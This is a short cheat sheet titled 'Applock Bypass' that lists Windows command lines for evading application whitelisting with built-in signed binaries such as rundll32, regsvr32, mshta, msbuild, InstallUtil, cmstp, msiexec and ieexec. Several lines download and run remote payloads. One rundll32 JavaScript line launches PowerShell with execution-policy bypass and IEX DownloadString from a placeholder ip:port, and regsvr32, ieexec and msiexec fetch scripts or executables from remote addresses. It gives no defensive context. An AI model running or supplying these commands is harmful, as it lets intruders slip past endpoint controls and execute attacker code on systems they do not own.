Applock Bypass

rundll32.exe javascript:"..\\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('[http://ip:port/'](http://ip:port/'));"

rundll32 shell32.dll,Control\_RunDLL payload.dll

regsvr32 /s /n /u /i:[http://example.com/file.sct](http://example.com/file.sct) scrobj.dll

msbuild.exe pshell.xml

regsvcs.exe /U regsvcs.dll regsvcs.exe regsvcs.dll

regasm.exe /U regsvcs.dll regasm.exe regsvcs.dll

bginfo.exe bginfo.bgi /popup /nolicprompt

InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll

mshta.exe evilfile.hta

cmd.exe /k < script.txt

Get-Content script.txt | iex

cscript.exe //E:vbscript script.txt

ieexec.exe [http://x.x.x.x:8080/bypass.exe](http://x.x.x.x:8080/bypass.exe)

cdb.exe -cf x64\_calc.wds -o notepad.exe

dnx.exe consoleapp

rcsi.exe bypass.csx

Control.exe

msxsl.exe customers.xml script.xsl

msiexec /quiet /i cmd.msi msiexec /q /i [http://192.168.100.3/tmp/cmd.png](http://192.168.100.3/tmp/cmd.png)

cmstp.exe /ni /s c:\\cmstp\\CorpVPN.inf

xwizard.exe argument1 argument2 DLL loading in same folder xwizard.dll

fsi.exe c:\\folder\\d.fscript

odbcconf -f file.rsp